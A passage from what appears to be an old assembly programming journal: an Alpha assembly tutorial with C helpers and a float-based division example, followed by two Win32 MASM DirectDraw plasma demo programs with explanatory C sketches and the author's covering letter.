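unsigned alpha_function(uint32_t w)    { return (w >> 5) & 0x7f; }  /* bits 11..5  */
int      alpha_has_literal(uint32_t w) { return (w >> 12) & 1; }    /* bit 12      */
unsigned alpha_literal(uint32_t w)     { return (w >> 13) & 0xff; } /* bits 20..13 */

/* Memory class: signed 16-bit byte displacement. */
int32_t alpha_mem_disp(uint32_t w)
{
    int32_t d = (int32_t)(w & 0xffff);
    return (d & 0x8000) ? d - 0x10000 : d;
}

/* Branch class: signed 21-bit displacement, counted in instructions. */
int32_t alpha_branch_disp(uint32_t w)
{
    int32_t d = (int32_t)(w & 0x1fffff);
    return (d & 0x100000) ? d - 0x200000 : d;
}

/* Assemble a register-register operate instruction from its fields. */
uint32_t alpha_operate(unsigned op, unsigned ra, unsigned rb,
                       unsigned fn, unsigned rc)
{
    return ((uint32_t)op << 26) | ((uint32_t)ra << 21) |
           ((uint32_t)rb << 16) | ((uint32_t)fn << 5) | (uint32_t)rc;
}

/* Print the operate-class view of an instruction word. */
void alpha_dump_operate(uint32_t w)
{
    printf("opcode=0x%02x ra=$%u rb=$%u function=0x%02x rc=$%u\n",
           alpha_opcode(w), alpha_ra(w), alpha_rb(w),
           alpha_function(w), alpha_rc(w));
}
```

The 8-bit literal field is where the 0-255 limit on "number" comes from.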

The usage convention for the registers is listed in the following tables.
Saved registers are those whose contents are not lost when a function is
called: a function that uses such a register has to save and restore it.

   int reg      Usage Convention           Saved
   ---------------------------------------------
   $0           Integer function result    No
   $1-$8        Conventional scratch regs  No
   $9-$14       General uses               Yes
   $15 or $fp   Frame pointer              Yes
   $16-$21      Integer arguments by value No
   $22-$25      Conventional scratch regs  No
   $26          Return address register    Yes
   $27          Procedure value (pointer)  No
   $28 or $at   reserved for system        No
   $29 or $gp   Global pointer             No
   $30 or $sp   Stack pointer              Yes
   $31          Zero (not modifiable)      n/a

   float reg    Usage Convention                Saved
   --------------------------------------------------
   $f0          floating point function result  No
   $f1          Imaginary part function result  No
   $f2-$f9      General uses                    Yes
   $f10-$f15    Conventional scratch regs       No
   $f16-$f21    Floating point args by value    No
   $f22-$f30    Conventional scratch regs       No
   $f31         Zero (not modifiable)           n/a

Data types are specified by suffixes (like q for quadword, l for longword).
Most integer operations only know these two suffixes. Floating point
operations know two suffixes as well: s (S-floating) and t (T-floating).

Integer Data types:
   Type         Bits   signed range                  unsigned range
   ---------------------------------------------------------------------------
   Byte         8      -128 to 127                   0 to 255
   Word         16     -32768 to 32767               0 to 65535
   Longword     32     -2147483648 to 2147483647     0 to 4294967295
   Quadword     64     -9223372036854775808 to       0 to 18446744073709551615
                        9223372036854775807
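
If you do not want to trust a table, you can let the compiler print the
ranges. This is only a sketch: it uses the fixed-width types from <stdint.h>
as stand-ins for byte, word, longword and quadword, and the function name is
made up.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

/* Print the signed and unsigned range of each integer width. */
void print_integer_ranges(void)
{
    printf("Byte      %d to %d, 0 to %d\n",
           INT8_MIN, INT8_MAX, UINT8_MAX);
    printf("Word      %d to %d, 0 to %d\n",
           INT16_MIN, INT16_MAX, UINT16_MAX);
    printf("Longword  %" PRId32 " to %" PRId32 ", 0 to %" PRIu32 "\n",
           INT32_MIN, INT32_MAX, UINT32_MAX);
    printf("Quadword  %" PRId64 " to %" PRId64 ", 0 to %" PRIu64 "\n",
           INT64_MIN, INT64_MAX, UINT64_MAX);
}
```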

Floating Point Data Types:
   Type         Magnitude                         Precision
   ----------------------------------------------------------------
   S-floating   1.175 x 10^-38 to 3.403 x 10^38    6 decimal digits
   T-floating   2.225 x 10^-308 to 1.798 x 10^308  15 decimal digits
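
S-floating and T-floating are the IEEE single and double precision formats.
Assuming your C compiler maps float and double onto them (gcc does on the
systems I know of), <float.h> reports the same limits. The function name
below is made up for this sketch.

```c
#include <float.h>
#include <stdio.h>

/* Print magnitude range and decimal precision of float and double. */
void print_float_limits(void)
{
    printf("float  (S-floating): %.3e to %.3e, %d decimal digits\n",
           (double)FLT_MIN, (double)FLT_MAX, FLT_DIG);
    printf("double (T-floating): %.3e to %.3e, %d decimal digits\n",
           DBL_MIN, DBL_MAX, DBL_DIG);
}
```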

If you want to use 64-bit numbers in the C programming language (gcc), use
(long) or (long int). (int) is 32 bits long.

The following example was tested on an SX164 with SuSE Alpha Linux 6.3
(Kernel 2.2.13).

The Example
-----------
My C program calls the assembler function div, which divides the first
argument given to it by the second one. By convention the arguments are passed
in the integer registers $16 and $17, so all we have to do is divide register
$16 by $17. The Alpha has no integer division instruction. There is a
pseudo-opcode for integer division, but I will show how to convert the
integers to floating point numbers, do the division in the floating point
registers and convert the result back to an integer. Finally, the result is
put in register $0, where by convention the C program expects it to be.
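
Before looking at the assembler, it may help to see the same three steps
(convert, divide, convert back) written in plain C. This is only a sketch of
the idea, not a translation of div.s: the name div_via_double is made up, the
function assumes b is not zero, and the C cast always truncates toward zero.
Keep in mind that a double has a 53-bit mantissa, so operands larger than 2^53
lose precision on the way through the floating point unit.

```c
#include <stdio.h>

/* Divide two 64-bit integers by way of double precision floating point. */
long div_via_double(long a, long b)
{
    double fa = (double)a;   /* integer -> floating point */
    double fb = (double)b;   /* integer -> floating point */
    double q  = fa / fb;     /* floating point division   */
    return (long)q;          /* floating point -> integer */
}

/* Print one division so the result can be compared with a / b. */
void show_division(long a, long b)
{
    printf("%ld / %ld = %ld\n", a, b, div_via_double(a, b));
}
```

With the numbers used in divide.c, show_division(1111, 14) reports 79.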

Compiling the source codes
--------------------------
gcc -c div.s
gcc -o div divide.c div.o


Source of the C-program
-----------------------
/* divide.c */
#include <stdio.h>

long div(long a, long b); /* implemented in div.s */

int main()
{
   long int a,b,c; /* long int is 64 bits long */
   a=1111; /* a random number */
   b=14;     /* second random number */
   c=div(a,b); /* div is a function written in assembler code */
   /* div returns the value of a / b */
   printf("c is %ld\n",c);
   return 0;
}
-------------------------------------------------- cut here


Source of the Assembler-Program: div.s
-------------------------------------------------- cut here
      .title div divides two arguments and returns the result
      .data               # Data section
temp1:    .quad 0             # temporary variable
temp2:    .quad 0             # temporary variable
temp3:    .quad 0             # temporary variable
      REGS = 1       # How many registers have to be saved
      STACK = REGS        # these registers will be put on the stack
      FRAME = ((STACK*8+8)/16)*16 # Stack frame size, a multiple of 16

      .text               # text section
      .align 4
      .set noreorder      # disallow rearrangements
      .globl div          # these 3 lines mark the
      .ent div       # mandatory function
div:                # entry
      ldgp $gp,0($27)          # load the global pointer
      lda $sp,-FRAME($sp) # load the stack pointer
      stq $26,0($sp)      # save our own exit address
      .frame $sp,FRAME,$26,0  # describe the stack frame
      .prologue 1
      stq $16,temp1       # save register $16 (first argument)
      stq $17,temp2       # save register $17 (second argument)
      ldt $f2,temp1       # load 1st argument in floating point register
      ldt $f3,temp2       # load 2nd argument in floating point register
      cvtqt $f2,$f2       # convert integer to floating point
      cvtqt $f3,$f3       # convert integer to floating point
      divt $f2,$f3,$f4    # $f4 <-- $f2 / $f3
      cvttq $f4,$f4       # convert floating point to integer
      stt $f4,temp3       # store integer
      ldq $0,temp3        # load integer in integer register
done:     ldq $26,0($sp)      # restore exit address
      lda $sp,FRAME($sp)  # Restore stack level
      ret $31,($26),1          # Back to c-program
      .end div       # Mark end of function
-------------------------------------------------- cut here



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                                            Direct Draw Examples
                                                            by X-Calibre


As a follow-up to the Direct Draw article in APJ#5, here are two complete
DirectDraw sample programs. The first uses an 8-bit palettized mode, while the
second uses a 32-bit (truecolor) mode. To compile these, you will need to
obtain Ddraw.inc ( http://asmjournal.freeservers.com/files/Ddraw.inc.html )
for the necessary DirectDraw definitions.


;Ddplasma8.asm_________________________________________________________________
;---------------------------------------;
;    DDRAW Plasma Demo                  ;
;                                       ;
;    Author :         X-Calibre         ;
;    ASM version :    Ewald Snel        ;
;    Copyright (C) 1999, Diamond Crew   ;
;                                       ;
;    http://here.is/diamond/            ;
;---------------------------------------;

     TITLE WIN32ASM EXAMPLE
     .486
     .MODEL FLAT, STDCALL
     option casemap :none

;-----------------------------------------------------------;
;                WIN32ASM / DDRAW PLASMA DEMO               ;
;-----------------------------------------------------------;

     INCLUDE \masm32\include\windows.inc

   ; -----------------------------------
   ; Note that the following is the
   ; include file written by Ewald Snel.
   ; -----------------------------------
     INCLUDE \masm32\include\ddraw.inc

     INCLUDE \masm32\include\gdi32.inc
     INCLUDE \masm32\include\kernel32.inc
     INCLUDE \masm32\include\user32.inc

     includelib \masm32\lib\gdi32.lib
     includelib \masm32\lib\ddraw.lib
     includelib \masm32\lib\kernel32.lib
     includelib \masm32\lib\user32.lib


     WinMain    PROTO :DWORD,:DWORD,:DWORD,:DWORD
     WndProc    PROTO :DWORD,:DWORD,:DWORD,:DWORD
     nextFrame  PROTO
     initPlasma PROTO

RETURN MACRO arg
     IFNB <arg>
         mov            eax, arg
     ENDIF
     ret
ENDM

LRETURN MACRO arg
     IFNB <arg>
         mov            eax, arg
     ENDIF
     leave
     ret
ENDM

FATAL MACRO msg
     LOCAL @@msg
     .DATA
     @@msg        db        msg, 0
     .CODE

     INVOKE MessageBox, hWnd, ADDR @@msg, ADDR szDisplayName, MB_OK
     INVOKE ExitProcess, 0
ENDM


.DATA?

hWnd            HWND                ?        ; surface window
lpDD            LPDIRECTDRAW        ?        ; DDraw object
lpDDSPrimary    LPDIRECTDRAWSURFACE ?        ; DDraw primary surface
ddsd            DDSURFACEDESC       <?>      ; DDraw surface descriptor
ddscaps         DDSCAPS             <?>      ; DDraw capabilities


palette            dd        256 dup (?)
table              dd        512 dup (?)
lpDDPalette        dd        ?


.DATA

ddwidth            EQU        320                ; display mode width
ddheight           EQU        200                ; display mode height
ddbpp              EQU        8                  ; display mode color depth

phaseA             dd         0
phaseB             dd         0

factor1            EQU        -2
factor2            EQU        -1
factor3            EQU         1
factor4            EQU        -2

red                dd        500.0
green              dd        320.0
blue               dd        372.0

scale1             dd        2.0
scale2             dd        128.0
scale3             dd        256.0
scale4             dd        127.0

szClassName        db            "DDRAW Plasma Demo", 0    ; class name
szDisplayName      EQU            <szClassName>            ; window name
color              dd            0

wc                WNDCLASSEX    < SIZEOF WNDCLASSEX, CS_HREDRAW OR CS_VREDRAW,
                                    OFFSET WndProc, 0, 0, , 0, 0, , 0,
                                    OFFSET szClassName, 0 >

.CODE

start:

     INVOKE GetModuleHandle, NULL
     INVOKE WinMain, eax, NULL, NULL, SW_SHOWDEFAULT
     INVOKE ExitProcess, eax

;-----------------------------------------------------------;
;                Calculate Next Plasma Frame                ;
;-----------------------------------------------------------;

nextFrame    PROC
     push        ebx
     push        esi
     push        edi

     mov            ecx , ddheight                ; # of scanlines
     mov            edi , [ddsd.lpSurface]        ; pixel output

@@scanline:
     push        ecx
     push        edi

     mov            esi , [phaseA]
     mov            edx , [phaseB]
     sub            esi , ecx
     and            edx , 0ffH
     and            esi , 0ffH
     mov            edx , [table][4*edx][256*4]
     mov            esi , [table][4*esi]        ; [x]  +  table0[a + y]
     sub            edx , ecx                    ; [y]  +  table1[b]
     mov            ecx , ddwidth                ; [x] --> pixel counter

@@pixel:
     and            esi , 0ffH
     and            edx , 0ffH
     mov            eax , [table][4*esi]
     mov            ebx , [table][4*edx][256*4]
     add            eax , ebx
     add            esi , factor3
     shr            eax , 1
     inc            edi
     add            edx , factor4
     dec            ecx
     mov            [edi][-1] , al
     jnz            @@pixel

     pop            edi
     pop            ecx
     add            edi , [ddsd.lPitch]            ; inc. display position
     dec            ecx
     jnz            @@scanline

     add            [phaseA] , factor1
     add            [phaseB] , factor2

     pop            edi
     pop            esi
     pop            ebx

     ret
nextFrame    ENDP

;-----------------------------------------------------------;
;                Initialize Plasma Tables                   ;
;-----------------------------------------------------------;

initPlasma    PROC

     LOCAL @@i :DWORD
     LOCAL @@r :DWORD
     LOCAL @@g :DWORD
     LOCAL @@b :DWORD
     LOCAL temp :DWORD


     mov            [@@i] , 0

     .WHILE @@i < 256

         mov            edx , [@@i]

; Calculate table0 value

         fldpi
         fimul        DWORD PTR [@@i]
         fmul        REAL4 PTR [scale1]
         fdiv        REAL4 PTR [scale3]
         fsin
         fmul        REAL4 PTR [scale4]
         fadd        REAL4 PTR [scale2]
         fistp        DWORD PTR [table][4*edx]

; Calculate table1 value

         fldpi
         fimul        DWORD PTR [@@i]
         fmul        REAL4 PTR [scale1]
         fdiv        REAL4 PTR [scale3]
         fcos
         fmul        REAL4 PTR [scale2]
         fadd        REAL4 PTR [scale2]
         fldpi
         fmulp        st(1), st
         fmul        REAL4 PTR [scale1]
         fdiv        REAL4 PTR [scale3]
         fsin
         fmul        REAL4 PTR [scale4]
         fadd        REAL4 PTR [scale2]
         fistp        DWORD PTR [table][4*edx][4*256]

; Calculate palette value

         xor            eax , eax

         FOR comp, <red, green, blue>
             fldpi
             fimul        DWORD PTR [@@i]
             fmul        REAL4 PTR [scale1]
             fdiv        REAL4 PTR [comp]
             fcos
             fmul        REAL4 PTR [scale4]
             fadd        REAL4 PTR [scale2]
             fistp        DWORD PTR [temp]
             shl            eax , 8
             or            eax , [temp]
         ENDM

         bswap          eax
         shr            eax, 8
         mov            [palette][4*edx] , eax
         inc            [@@i]

     .ENDW

       ; Set palette
       DDINVOKE        CreatePalette, lpDD, DDPCAPS_8BIT or DDPCAPS_ALLOW256,
                                       ADDR palette, ADDR lpDDPalette, NULL
      .IF eax != DD_OK
           FATAL "Couldn't create palette"
      .ENDIF

      DDSINVOKE       SetPalette, lpDDSPrimary, lpDDPalette
      .IF eax != DD_OK
           FATAL "Couldn't set palette"
      .ENDIF

     ret

initPlasma    ENDP

;-----------------------------------------------------------;
;                WinMain  ( entry point )                   ;
;-----------------------------------------------------------;

WinMain PROC hInst     :DWORD,
              hPrevInst :DWORD,
              CmdLine   :DWORD,
              CmdShow   :DWORD

     LOCAL msg  :MSG

; Fill WNDCLASSEX structure with required variables

     mov            eax , [hInst]
     mov            [wc.hInstance] , eax
     INVOKE         GetStockObject , BLACK_BRUSH
     mov            [wc.hbrBackground] , eax

     INVOKE RegisterClassEx, ADDR wc


; Create window at following size

     INVOKE CreateWindowEx, 0,
                             ADDR szClassName,
                             ADDR szDisplayName,
                             WS_POPUP,
                             0, 0, ddwidth, ddheight,
                             NULL, NULL,
                             hInst, NULL
     mov            [hWnd] , eax

     INVOKE ShowWindow, hWnd, SW_MAXIMIZE
     INVOKE SetFocus, hWnd
     INVOKE ShowCursor, 0


; Initialize display

     INVOKE DirectDrawCreate, NULL, ADDR lpDD, NULL
     .IF eax != DD_OK
         FATAL "Couldn't init DirectDraw"
     .ENDIF

     DDINVOKE SetCooperativeLevel, lpDD, hWnd, DDSCL_EXCLUSIVE OR DDSCL_FULLSCREEN
     .IF eax != DD_OK
         FATAL "Couldn't set DirectDraw cooperative level"
     .ENDIF

     DDINVOKE SetDisplayMode, lpDD, ddwidth, ddheight, ddbpp
     .IF eax != DD_OK
         FATAL "Couldn't set display mode"
     .ENDIF

     mov            [ddsd.dwSize] , SIZEOF DDSURFACEDESC
     mov            [ddsd.dwFlags] , DDSD_CAPS
     mov            [ddsd.ddsCaps.dwCaps] , DDSCAPS_PRIMARYSURFACE
     DDINVOKE CreateSurface, lpDD, ADDR ddsd, ADDR lpDDSPrimary, NULL
     .IF eax != DD_OK
     FATAL "Couldn't create primary surface"
     .ENDIF

     call        initPlasma

; Loop until PostQuitMessage is sent
     .WHILE 1

         INVOKE PeekMessage, ADDR msg, NULL, 0, 0, PM_REMOVE

         .IF eax != 0
             .IF msg.message == WM_QUIT
                 INVOKE PostQuitMessage, msg.wParam
                 .BREAK
             .ELSE
                 INVOKE TranslateMessage, ADDR msg
                 INVOKE DispatchMessage, ADDR msg
             .ENDIF
         .ELSE
             INVOKE GetFocus

             .IF eax == hWnd

                 mov            [ddsd.dwSize] , SIZEOF DDSURFACEDESC
                 mov            [ddsd.dwFlags] , DDSD_PITCH

                 .WHILE 1
                     DDSINVOKE mLock, lpDDSPrimary, NULL, ADDR ddsd, DDLOCK_WAIT, NULL

                     .BREAK .IF eax == DD_OK

                     .IF eax == DDERR_SURFACELOST
                         DDSINVOKE Restore, lpDDSPrimary
                     .ELSE
                         FATAL "Couldn't lock surface"
                     .ENDIF
                 .ENDW

                 DDINVOKE WaitForVerticalBlank, lpDD, DDWAITVB_BLOCKBEGIN, NULL

                 call        nextFrame

                 DDSINVOKE Unlock, lpDDSPrimary, ddsd.lpSurface

             .ENDIF
         .ENDIF
     .ENDW

     .IF lpDD != NULL

           .IF lpDDSPrimary != NULL
             DDSINVOKE Release, lpDDSPrimary
             mov            [lpDDSPrimary] , NULL
         .ENDIF

          DDINVOKE Release, lpDD
         mov            [lpDD] , NULL

     .ENDIF

     LRETURN msg.wParam

WinMain ENDP

;-----------------------------------------------------------;
;                Window Proc  ( handle events )             ;
;-----------------------------------------------------------;

WndProc PROC hWin   :DWORD,
              uMsg   :DWORD,
              wParam :DWORD,
              lParam :DWORD

     .IF uMsg == WM_KEYDOWN
         .IF wParam == VK_ESCAPE
             INVOKE PostQuitMessage, NULL
             RETURN 0
         .ENDIF
     .ELSEIF uMsg == WM_DESTROY
         INVOKE PostQuitMessage, NULL
         RETURN 0
     .ENDIF

     INVOKE DefWindowProc, hWin, uMsg, wParam, lParam

     ret

WndProc ENDP

END start
;End_Ddplasma8.asm_____________________________________________________________
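
If the register juggling in nextFrame is hard to follow, the C sketch below is
my reading of what the 8-bit loop computes. It is not part of the original
sources. The names are made up, the two halves of the 512-entry table are
passed as separate arrays table0 and table1, and the surface pointer and pitch
are plain parameters instead of fields of ddsd.

```c
#include <stddef.h>
#include <stdint.h>

#define PLASMA_W 320   /* ddwidth  */
#define PLASMA_H 200   /* ddheight */

/* Render one frame into an 8-bit surface and advance both phases. */
void plasma_frame(uint8_t *surface, size_t pitch,
                  const uint32_t table0[256], const uint32_t table1[256],
                  uint32_t *phase_a, uint32_t *phase_b)
{
    /* rows_left plays the role of ECX in the scanline loop: 200 down to 1 */
    for (uint32_t rows_left = PLASMA_H; rows_left > 0; rows_left--) {
        uint32_t a = table0[(*phase_a - rows_left) & 0xff];   /* ESI */
        uint32_t b = table1[*phase_b & 0xff] - rows_left;     /* EDX */

        for (int x = 0; x < PLASMA_W; x++) {
            a &= 0xff;
            b &= 0xff;
            /* average of the two table lookups is the palette index */
            surface[x] = (uint8_t)((table0[a] + table1[b]) >> 1);
            a += 1;   /* factor3 */
            b -= 2;   /* factor4 */
        }
        surface += pitch;   /* next scanline */
    }
    *phase_a -= 2;   /* factor1 */
    *phase_b -= 1;   /* factor2 */
}
```

The unsigned arithmetic wraps around just like the 32-bit registers do, and
the masking with 0ffh keeps every table index inside 0..255.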


;Ddplasma32.asm________________________________________________________________
;---------------------------------------;
;    DDRAW Plasma Demo                  ;
;                                       ;
;    Author :         X-Calibre         ;
;    ASM version :    Ewald Snel        ;
;    Copyright (C) 1999, Diamond Crew   ;
;                                       ;
;    http://here.is/diamond/            ;
;---------------------------------------;

     TITLE WIN32ASM EXAMPLE
     .386
     .MODEL FLAT, STDCALL
     option casemap :none

;-----------------------------------------------------------;
;                WIN32ASM / DDRAW PLASMA DEMO               ;
;-----------------------------------------------------------;

     INCLUDE \masm32\include\windows.inc

   ; -----------------------------------
   ; Note that the following is the
   ; include file written by Ewald Snel.
   ; -----------------------------------
     INCLUDE .\ddraw.inc

     INCLUDE \masm32\include\gdi32.inc
     INCLUDE \masm32\include\kernel32.inc
     INCLUDE \masm32\include\user32.inc

     includelib \masm32\lib\gdi32.lib
     includelib \masm32\lib\ddraw.lib
     includelib \masm32\lib\kernel32.lib
     includelib \masm32\lib\user32.lib


     WinMain    PROTO :DWORD,:DWORD,:DWORD,:DWORD
     WndProc    PROTO :DWORD,:DWORD,:DWORD,:DWORD
     nextFrame  PROTO
     initPlasma PROTO

RETURN MACRO arg
     IFNB <arg>
         mov            eax, arg
     ENDIF
     ret
ENDM

LRETURN MACRO arg
     IFNB <arg>
         mov            eax, arg
     ENDIF
     leave
     ret
ENDM

FATAL MACRO msg
     LOCAL @@msg
     .DATA
     @@msg        db        msg, 0
     .CODE

     INVOKE MessageBox, hWnd, ADDR @@msg, ADDR szDisplayName, MB_OK
     INVOKE ExitProcess, 0
ENDM


.DATA?

palette            dd        256 dup (?)
table              dd        512 dup (?)
hWnd            HWND                ?        ; surface window
lpDD            LPDIRECTDRAW        ?        ; DDraw object
lpDDSPrimary    LPDIRECTDRAWSURFACE ?        ; DDraw primary surface
ddsd            DDSURFACEDESC       <?>      ; DDraw surface descriptor
ddscaps            DDSCAPS          <?>      ; DDraw capabilities


.DATA

ddwidth            EQU        320                ; display mode width
ddheight           EQU        200                ; display mode height
ddbpp              EQU        32                 ; display mode color depth

phaseA             dd         0
phaseB             dd         0

factor1            EQU        -2
factor2            EQU        -1
factor3            EQU         1
factor4            EQU        -2

red                dd        500.0
green              dd        320.0
blue               dd        372.0

scale1             dd        2.0
scale2             dd        128.0
scale3             dd        256.0
scale4             dd        127.0


szClassName        db            "DDRAW Plasma Demo", 0    ; class name
szDisplayName    EQU            <szClassName>            ; window name
color            dd            0

wc                WNDCLASSEX    < SIZEOF WNDCLASSEX, CS_HREDRAW OR CS_VREDRAW,
                                   OFFSET WndProc, 0, 0, , 0, 0, , 0,
                                   OFFSET szClassName, 0 >


.CODE

start:

     INVOKE GetModuleHandle, NULL
     INVOKE WinMain, eax, NULL, NULL, SW_SHOWDEFAULT
     INVOKE ExitProcess, eax

;-----------------------------------------------------------;
;                Calculate Next Plasma Frame                ;
;-----------------------------------------------------------;

nextFrame    PROC
     push        ebx
     push        esi
     push        edi

     mov            ecx , ddheight                ; # of scanlines
     mov            edi , [ddsd.lpSurface]        ; pixel output

@@scanline:
     push        ecx
     push        edi

     mov            esi , [phaseA]
     mov            edx , [phaseB]
     sub            esi , ecx
     and            edx , 0ffH
     and            esi , 0ffH
     mov            edx , [table][4*edx][256*4]
     mov            esi , [table][4*esi]        ; [x]  +  table0[a + y]
     sub            edx , ecx                    ; [y]  +  table1[b]
     mov            ecx , ddwidth                ; [x] --> pixel counter

@@pixel:
     and            esi , 0ffH
     and            edx , 0ffH
     mov            eax , [table][4*esi]
     mov            ebx , [table][4*edx][256*4]
     add            eax , ebx
     add            esi , factor3
     shr            eax , 1
     add            edx , factor4
     and            eax , 0ffH
     add            edi , 4
     mov            eax , [palette][4*eax]
     dec            ecx
     mov            [edi][-4] , eax
     jnz            @@pixel

     pop            edi
     pop            ecx
     add            edi , [ddsd.lPitch]            ; inc. display position
     dec            ecx
     jnz            @@scanline

     add            [phaseA] , factor1
     add            [phaseB] , factor2

     pop            edi
     pop            esi
     pop            ebx

     ret
nextFrame    ENDP

;-----------------------------------------------------------;
;                Initialize Plasma Tables                   ;
;-----------------------------------------------------------;

initPlasma    PROC

     LOCAL @@i :DWORD
     LOCAL @@r :DWORD
     LOCAL @@g :DWORD
     LOCAL @@b :DWORD
     LOCAL temp :DWORD


     mov            [@@i] , 0

     .WHILE @@i < 256

         mov            edx , [@@i]

; Calculate table0 value

         fldpi
         fimul        DWORD PTR [@@i]
         fmul        REAL4 PTR [scale1]
         fdiv        REAL4 PTR [scale3]
         fsin
         fmul        REAL4 PTR [scale4]
         fadd        REAL4 PTR [scale2]
         fistp        DWORD PTR [table][4*edx]

; Calculate table1 value

         fldpi
         fimul        DWORD PTR [@@i]
         fmul        REAL4 PTR [scale1]
         fdiv        REAL4 PTR [scale3]
         fcos
         fmul        REAL4 PTR [scale2]
         fadd        REAL4 PTR [scale2]
         fldpi
         fmulp        st(1), st
         fmul        REAL4 PTR [scale1]
         fdiv        REAL4 PTR [scale3]
         fsin
         fmul        REAL4 PTR [scale4]
         fadd        REAL4 PTR [scale2]
         fistp        DWORD PTR [table][4*edx][4*256]

; Calculate palette value

         xor            eax , eax

         FOR comp, <red, green, blue>
             fldpi
             fimul        DWORD PTR [@@i]
             fmul        REAL4 PTR [scale1]
             fdiv        REAL4 PTR [comp]
             fcos
             fmul        REAL4 PTR [scale4]
             fadd        REAL4 PTR [scale2]
             fistp        DWORD PTR [temp]
             shl            eax , 8
             or            eax , [temp]
         ENDM

         mov            [palette][4*edx] , eax
         inc            [@@i]

     .ENDW

     ret

initPlasma    ENDP

;-----------------------------------------------------------;
;                WinMain  ( entry point )                   ;
;-----------------------------------------------------------;

WinMain PROC hInst     :DWORD,
              hPrevInst :DWORD,
              CmdLine   :DWORD,
              CmdShow   :DWORD

     LOCAL msg  :MSG

; Fill WNDCLASSEX structure with required variables

     mov            eax , [hInst]
     mov            [wc.hInstance] , eax
     INVOKE         GetStockObject, BLACK_BRUSH
     mov            [wc.hbrBackground] , eax

     INVOKE RegisterClassEx, ADDR wc


; Create window at following size

     INVOKE CreateWindowEx, 0,
                             ADDR szClassName,
                             ADDR szDisplayName,
                             WS_POPUP,
                             0, 0, ddwidth, ddheight,
                             NULL, NULL,
                             hInst, NULL
     mov            [hWnd] , eax

     INVOKE ShowWindow, hWnd, SW_MAXIMIZE
     INVOKE SetFocus, hWnd
     INVOKE ShowCursor, 0


; Initialize display

     INVOKE DirectDrawCreate, NULL, ADDR lpDD, NULL
     .IF eax != DD_OK
         FATAL "Couldn't init DirectDraw"
     .ENDIF

     DDINVOKE SetCooperativeLevel, lpDD, hWnd, DDSCL_EXCLUSIVE OR DDSCL_FULLSCREEN
     .IF eax != DD_OK
         FATAL "Couldn't set DirectDraw cooperative level"
     .ENDIF

     DDINVOKE SetDisplayMode, lpDD, ddwidth, ddheight, ddbpp
     .IF eax != DD_OK
         FATAL "Couldn't set display mode"
     .ENDIF

     mov            [ddsd.dwSize] , SIZEOF DDSURFACEDESC
     mov            [ddsd.dwFlags] , DDSD_CAPS
     mov            [ddsd.ddsCaps.dwCaps] , DDSCAPS_PRIMARYSURFACE
     DDINVOKE CreateSurface, lpDD, ADDR ddsd, ADDR lpDDSPrimary, NULL
     .IF eax != DD_OK
     FATAL "Couldn't create primary surface"
     .ENDIF


     call        initPlasma

; Loop until PostQuitMessage is sent

     .WHILE 1

         INVOKE PeekMessage, ADDR msg, NULL, 0, 0, PM_REMOVE

         .IF eax != 0
             .IF msg.message == WM_QUIT
                 INVOKE PostQuitMessage, msg.wParam
                 .BREAK
             .ELSE
                 INVOKE TranslateMessage, ADDR msg
                 INVOKE DispatchMessage, ADDR msg
             .ENDIF
         .ELSE
             INVOKE GetFocus

             .IF eax == hWnd

                 mov            [ddsd.dwSize] , SIZEOF DDSURFACEDESC
                 mov            [ddsd.dwFlags] , DDSD_PITCH

                 .WHILE 1
                     DDSINVOKE mLock, lpDDSPrimary, NULL, ADDR ddsd, DDLOCK_WAIT, NULL

                     .BREAK .IF eax == DD_OK

                     .IF eax == DDERR_SURFACELOST
                         DDSINVOKE Restore, lpDDSPrimary
                     .ELSE
                         FATAL "Couldn't lock surface"
                     .ENDIF
                 .ENDW

                 DDINVOKE WaitForVerticalBlank, lpDD, DDWAITVB_BLOCKBEGIN, NULL

                 call        nextFrame

                 DDSINVOKE Unlock, lpDDSPrimary, ddsd.lpSurface

             .ENDIF
         .ENDIF
     .ENDW

     .IF lpDD != NULL

           .IF lpDDSPrimary != NULL
             DDSINVOKE Release, lpDDSPrimary
             mov            [lpDDSPrimary] , NULL
         .ENDIF

          DDINVOKE Release, lpDD
         mov            [lpDD] , NULL

     .ENDIF

     LRETURN msg.wParam

WinMain ENDP

;-----------------------------------------------------------;
;                Window Proc  ( handle events )             ;
;-----------------------------------------------------------;

WndProc PROC hWin   :DWORD,
              uMsg   :DWORD,
              wParam :DWORD,
              lParam :DWORD

     .IF uMsg == WM_KEYDOWN
         .IF wParam == VK_ESCAPE
             INVOKE PostQuitMessage, NULL
             RETURN 0
         .ENDIF
     .ELSEIF uMsg == WM_DESTROY
         INVOKE PostQuitMessage, NULL
         RETURN 0
     .ENDIF

     INVOKE DefWindowProc, hWin, uMsg, wParam, lParam

     ret

WndProc ENDP

END start
;End_Ddplasma32.asm____________________________________________________________
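
One difference between the two listings is easy to miss. Both build a colour
by shifting EAX left by 8 and OR-ing in red, green and blue in turn, but only
the 8-bit version follows this with bswap and shr 8 before storing the value.
The C sketch below shows what that does to the byte order. The function names
are made up. That the swapped layout matches a Win32 PALETTEENTRY (red, green,
blue, flags in memory order) is how I read the code, and that the unswapped
value suits the 32-bit surface is an assumption about the pixel format.

```c
#include <stdint.h>

/* Pack three components the way the FOR loop in initPlasma does. */
uint32_t pack_rgb(uint8_t r, uint8_t g, uint8_t b)
{
    uint32_t v = 0;
    v = (v << 8) | r;
    v = (v << 8) | g;
    v = (v << 8) | b;
    return v;                 /* 0x00RRGGBB, stored as is by Ddplasma32 */
}

/* Portable equivalent of the BSWAP instruction. */
uint32_t bswap32(uint32_t v)
{
    return (v >> 24) | ((v >> 8) & 0x0000ff00u) |
           ((v << 8) & 0x00ff0000u) | (v << 24);
}

/* Ddplasma8: bswap followed by shr 8 gives 0x00BBGGRR, which a
   little-endian machine stores as the bytes R, G, B, 0. */
uint32_t to_palette_entry(uint32_t rgb)
{
    return bswap32(rgb) >> 8;
}
```

BSWAP first appeared on the 486, which presumably explains why Ddplasma8.asm
asks for .486 while Ddplasma32.asm gets by with .386.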





I had mail problems last time... I don't think the example program from
the DDRAW tut ever reached you... and now you were looking for a Windows
article for issue #6... Maybe you can put the example in there... It's
Win32, and it would also double as a sequel to the article of issue #5 :)
Well, there are 2 examples actually... They look the same on screen, but one
shows how to use 8 bit palette mode (like good old mode 13h), where
the other shows 32 bit truecolor mode...
I also included the original DDRAW.INC, so people can assemble the
sources themselves...
I hope this time it reaches you, and that I could have been of help to you,
X-Calibre




::/ \::::::.
:/___\:::::::.
